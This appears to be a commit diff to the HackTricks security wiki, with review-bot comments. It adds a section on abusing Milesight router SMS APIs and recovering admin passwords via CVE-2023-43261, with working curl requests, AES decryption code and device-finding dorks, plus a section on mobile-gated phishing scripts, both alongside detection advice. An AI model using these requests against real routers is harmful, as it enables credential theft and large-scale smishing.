mirror of https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00

Add content from: Silent Smishing: The Hidden Abuse of Cellular Router APIs

parent cd60902021
commit c8a99a2b35
				| @ -247,6 +247,73 @@ Mitigations: | ||||
| - Alert on NAS security modes that result in null algorithms or frequent replays of InitialUEMessage. | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ## 10. Industrial Cellular Routers – Unauthenticated SMS API Abuse (Milesight UR5X/UR32/UR35/UR41) and Credential Recovery (CVE-2023-43261) | ||||
| 
 | ||||
| Abusing exposed web APIs of industrial cellular routers enables stealthy, carrier-origin smishing at scale. Milesight UR-series routers expose a JSON-RPC–style endpoint at `/cgi`. When misconfigured, the API can be queried without authentication to list SMS inbox/outbox and, in some deployments, to send SMS. | ||||
| 
 | ||||
| Typical unauthenticated requests (same structure for inbox/outbox): | ||||
| 
 | ||||
| ```http | ||||
| POST /cgi HTTP/1.1 | ||||
| Host: <router> | ||||
| Content-Type: application/json | ||||
| 
 | ||||
| { "base": "query_outbox", "function": "query_outbox", "values": [ {"page":1,"per_page":50} ] } | ||||
| ``` | ||||
| 
 | ||||
| ```json | ||||
| { "base": "query_inbox", "function": "query_inbox", "values": [ {"page":1,"per_page":50} ] } | ||||
| ``` | ||||
| 
 | ||||
| Responses include fields such as `timestamp`, `content`, `phone_number` (E.164), and `status` (`success` or `failed`). Repeated `failed` sends to the same number are often attacker “capability checks” to validate that a router/SIM can deliver before blasting. | ||||
| 
 | ||||
| Example curl to exfiltrate SMS metadata: | ||||
| 
 | ||||
| ```bash | ||||
| curl -sk -X POST http://<router>/cgi \ | ||||
|   -H 'Content-Type: application/json' \ | ||||
|   -d '{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}' | ||||
| ``` | ||||
| 
 | ||||
| Notes on auth artifacts: | ||||
| - Some traffic may include an auth cookie, but a large fraction of exposed devices respond without any authentication to `query_inbox`/`query_outbox` when the management interface is Internet-facing. | ||||
| - In environments requiring auth, previously-leaked credentials (see below) restore access. | ||||
| 
 | ||||
| Credential recovery path – CVE-2023-43261: | ||||
| - Affected families: UR5X, UR32L, UR32, UR35, UR41 (pre v35.3.0.7). | ||||
| - Issue: web-served logs (e.g., `httpd.log`) are reachable unauthenticated under `/lang/log/` and contain admin login events with the password encrypted using a hardcoded AES key/IV present in client-side JavaScript. | ||||
| - Practical access and decrypt: | ||||
| 
 | ||||
| ```bash | ||||
| curl -sk http://<router>/lang/log/httpd.log | sed -n '1,200p' | ||||
| # Look for entries like: {"username":"admin","password":"<base64>"} | ||||
| ``` | ||||
| 
 | ||||
| Minimal Python to decrypt leaked passwords (AES-128-CBC, hardcoded key/IV): | ||||
| 
 | ||||
| ```python | ||||
| import base64 | ||||
| from Crypto.Cipher import AES | ||||
| from Crypto.Util.Padding import unpad | ||||
| KEY=b'1111111111111111'; IV=b'2222222222222222' | ||||
| enc_b64='...'  # value from httpd.log | ||||
| print(unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(enc_b64)), AES.block_size).decode()) | ||||
| ``` | ||||
| 
 | ||||
| Hunting and detection ideas (network): | ||||
| - Alert on unauthenticated `POST /cgi` whose JSON body contains `base`/`function` set to `query_inbox` or `query_outbox`. | ||||
| - Track repeated `POST /cgi` bursts followed by `status":"failed"` entries across many unique numbers from the same source IP (capability testing). | ||||
| - Inventory Internet-exposed Milesight routers; restrict management to VPN; disable SMS features unless required; upgrade to ≥ v35.3.0.7; rotate credentials and review SMS logs for unknown sends. | ||||
| 
 | ||||
| Shodan/OSINT pivots (examples seen in the wild): | ||||
| - `http.html:"rt_title"` matches Milesight router panels. | ||||
| - Google dorking for exposed logs: `"/lang/log/system" ext:log`. | ||||
| 
 | ||||
| Operational impact: using legitimate carrier SIMs inside routers gives very high SMS deliverability/credibility for phishing, while inbox/outbox exposure leaks sensitive metadata at scale. | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ## Detection Ideas | ||||
| 1. **Any device other than an SGSN/GGSN establishing Create PDP Context Requests**. | ||||
| 2. **Non-standard ports (53, 80, 443) receiving SSH handshakes** from internal IPs. | ||||
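Review bot: the second hunting bullet's pattern `status":"failed"` is missing its opening quote and should read `"status":"failed"`, and the first bullet as written will also fire on legitimate management sessions, which issue the same `query_inbox`/`query_outbox` calls to `POST /cgi` (the hunk itself notes that some traffic carries an auth cookie); suggest qualifying the alert on the absence of that cookie or on a source address outside the management network. Two smaller points: the inbox request is fenced as `json` while the outbox one is `http`, so the two examples are not parallel even though the text says they share the same structure, and the Python decrypt snippet should state its dependency (`from Crypto.Cipher import AES` needs the pycryptodome package) and take the base64 value as a function argument instead of the `enc_b64='...'` placeholder, since `.decode()` on the unpadded bytes will also raise if the plaintext is not valid UTF-8.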
| @ -263,5 +330,8 @@ Mitigations: | ||||
| - [Demystifying 5G Security: Understanding the Registration Protocol](https://bishopfox.com/blog/demystifying-5g-security-understanding-the-registration-protocol) | ||||
| - 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS | ||||
| - 3GPP TS 33.501 – Security architecture and procedures for 5G System | ||||
| - [Silent Smishing: The Hidden Abuse of Cellular Router APIs (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/) | ||||
| - [CVE-2023-43261 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-43261) | ||||
| - [CVE-2023-43261 PoC (win3zz)](https://github.com/win3zz/CVE-2023-43261) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
|  | ||||
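Review bot: the two trailing context lines `{{#include ../../banners/hacktricks-training.md}}` show the banner included twice back to back at the end of the file; since this hunk already edits that region, drop the duplicate line so the banner renders once.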
| @ -579,6 +579,37 @@ clipboard-hijacking.md | ||||
| mobile-phishing-malicious-apps.md | ||||
| {{#endref}} | ||||
| 
 | ||||
| ### Mobile‑gated phishing to evade crawlers/sandboxes | ||||
| Operators increasingly gate their phishing flows behind a simple device check so desktop crawlers never reach the final pages. A common pattern is a small script that tests for a touch-capable DOM and posts the result to a server endpoint; non‑mobile clients receive HTTP 500 (or a blank page), while mobile users are served the full flow. | ||||
| 
 | ||||
| Minimal client snippet (typical logic): | ||||
| 
 | ||||
| ```html | ||||
| <script src="/static/detect_device.js"></script> | ||||
| ``` | ||||
| 
 | ||||
| `detect_device.js` logic (simplified): | ||||
| 
 | ||||
| ```javascript | ||||
| const isMobile = ('ontouchstart' in document.documentElement); | ||||
| fetch('/detect', {method:'POST', headers:{'Content-Type':'application/json'}, body: JSON.stringify({is_mobile:isMobile})}) | ||||
|   .then(()=>location.reload()); | ||||
| ``` | ||||
| 
 | ||||
| Server behaviour often observed: | ||||
| - Sets a session cookie during the first load. | ||||
| - Accepts `POST /detect {"is_mobile":true|false}`. | ||||
| - Returns 500 (or placeholder) to subsequent GETs when `is_mobile=false`; serves phishing only if `true`. | ||||
| 
 | ||||
| Hunting and detection heuristics: | ||||
| - urlscan query: `filename:"detect_device.js" AND page.status:500` | ||||
| - Web telemetry: sequence of `GET /static/detect_device.js` → `POST /detect` → HTTP 500 for non‑mobile; legitimate mobile victim paths return 200 with follow‑on HTML/JS. | ||||
| - Block or scrutinize pages that condition content exclusively on `ontouchstart` or similar device checks. | ||||
| 
 | ||||
| Defence tips: | ||||
| - Execute crawlers with mobile‑like fingerprints and JS enabled to reveal gated content. | ||||
| - Alert on suspicious 500 responses following `POST /detect` on newly registered domains. | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - [https://zeltser.com/domain-name-variations-in-phishing/](https://zeltser.com/domain-name-variations-in-phishing/) | ||||
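Review bot: the defence tip "Execute crawlers with mobile-like fingerprints" understates what the visible check requires: `'ontouchstart' in document.documentElement` is a feature test, not a User-Agent test, so a spoofed mobile UA alone still posts `is_mobile:false`; the crawler must emulate touch events so the property exists, and because the server stores the result against the session cookie set on first load, a retry with touch emulation must start from a fresh cookie jar or it keeps receiving the 500. Suggest saying "touch-capable fingerprints (emulated touch events) and a fresh session per attempt" in that bullet.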
| @ -586,6 +617,7 @@ mobile-phishing-malicious-apps.md | ||||
| - [https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/](https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/) | ||||
| - [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy) | ||||
| - [2025 Unit 42 Global Incident Response Report – Social Engineering Edition](https://unit42.paloaltonetworks.com/2025-unit-42-global-incident-response-report-social-engineering-edition/) | ||||
| - [Silent Smishing – mobile-gated phishing infra and heuristics (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| 
 | ||||
|  | ||||
| @ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con | ||||
| 
 | ||||
| > [!TIP] | ||||
| > | ||||
| > - **How can I cite a page of HackTricks?** | ||||
| > - **How can I  a page of HackTricks?** | ||||
| 
 | ||||
| As long as the link **of** the page(s) where you took the information from appears it's enough.\ | ||||
| If you need a bibtex you can use something like: | ||||
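Review bot: the change to the tip line drops the word "cite", leaving `> - **How can I  a page of HackTricks?**` with a double space and no verb; this looks accidental and should be reverted to `> - **How can I cite a page of HackTricks?**`.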
| @ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the | ||||
| 
 | ||||
| {{#include ../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| 
 | ||||
|  | ||||